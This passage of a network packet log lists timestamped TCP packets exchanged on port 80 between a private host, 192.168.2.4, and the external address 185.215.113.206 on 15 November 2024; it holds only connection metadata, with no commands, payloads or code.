Nov 15, 2024 14:09:26.585567951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.585578918 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.585591078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.585604906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.589978933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.589998007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.590013981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.590029955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.590030909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.590055943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.590055943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.590065002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.591273069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.591298103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.591325998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.591336012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.591336966 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.591355085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.591371059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.591394901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.591423988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.595660925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.595685005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.595700979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.595716000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.595722914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.595732927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.595738888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.595763922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.595788002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.601171970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.601197958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.601212025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.601223946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.601243973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.601252079 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.643531084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.652473927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929352045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929375887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929394960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929409981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.929445982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.929630995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929650068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929666042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929682970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.929692984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.929708958 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.929729939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.930471897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.930490017 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.930505991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.930515051 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.930524111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.930526972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.930542946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.930557013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.931354046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.931371927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.931386948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.931401968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.931406975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.931427956 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.931453943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.932503939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.932522058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.932538986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.932554960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.932555914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.932574034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.932584047 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.932607889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.933445930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.933459997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.933470964 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.933480978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.933490992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.933512926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.933533907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.934469938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.934488058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.934504032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.934520006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.934551954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.934576035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.935157061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.935174942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.935192108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.935205936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.935208082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.935218096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.935225010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.935241938 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.935260057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.935270071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.936136007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.936153889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.936171055 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.936186075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.936192989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.936222076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.936253071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.937169075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.937186956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.937202930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.937218904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.937244892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.937263012 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.937977076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.937994957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.938010931 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.938030005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.938045025 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.938060999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.938081980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.939305067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.939461946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.939464092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.939505100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.939518929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.939529896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.939541101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.939557076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.939580917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.940599918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.940622091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.940638065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.940653086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.940670013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.940685987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.940699100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.940723896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.941576958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.941595078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.941612005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.941628933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.941644907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.941663027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.941687107 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.942650080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.942667961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.942697048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.942708969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.942719936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.942744017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.942760944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.943402052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.943420887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.943438053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.943447113 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.943455935 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.943461895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.943485022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.943492889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.945060968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.945077896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.945110083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.945136070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.049118042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.049140930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.049159050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.049194098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.049231052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.049870968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.049896002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.049952984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.050067902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050086975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050121069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.050148010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.050223112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050240993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050256968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050275087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.050307035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.050323963 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.051188946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.051207066 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.051223040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.051239014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.051254988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.051255941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.051281929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.051299095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.052217007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.052234888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.052251101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.052267075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.052270889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.052294016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.052310944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053097010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053122044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053138018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053148031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053155899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053158045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053174019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053174019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053198099 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053205013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053904057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053920984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053937912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053952932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053968906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.053971052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.053997993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.054012060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.054869890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.054888010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.054903984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.054920912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.054922104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.054948092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.054955959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.055802107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.055819988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.055835962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.055851936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.055851936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.055871010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.055871010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.055896044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.055918932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.056708097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.056725979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.056741953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.056759119 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.056776047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.056783915 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.056802034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.056823969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.057564020 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.057580948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.057598114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.057614088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.057630062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.057635069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.057643890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.057671070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.058434963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.058453083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.058470011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.058485985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.058485985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.058495998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.058511972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.058522940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.059324026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059340000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059355021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059370041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059384108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059398890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.059400082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.059425116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.059437990 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.060255051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060271978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060287952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060303926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060309887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.060322046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060323000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.060340881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.060348034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.060370922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.060379982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061058998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061075926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061093092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061108112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061108112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061119080 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061126947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061136007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061144114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061167002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.061945915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061964035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061976910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.061991930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.062007904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.062021017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.062026978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.062046051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.062055111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.062067032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.062088966 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063060999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063077927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063093901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063110113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063117027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063126087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063134909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063159943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063179970 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063714027 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063731909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063749075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063765049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063777924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063781977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063793898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063803911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063811064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.063812971 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063839912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.063848019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.064702988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.064721107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.064737082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.064766884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.064775944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.064785957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.064816952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.064832926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.065510988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.065529108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.065543890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.065558910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.065560102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.065570116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.065589905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.065604925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.066041946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.066060066 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.066090107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.066103935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.066107035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.066121101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.066135883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.066159010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067157030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067174911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067190886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067207098 CET	80	49752	185.215.113.206	192.168.2.4
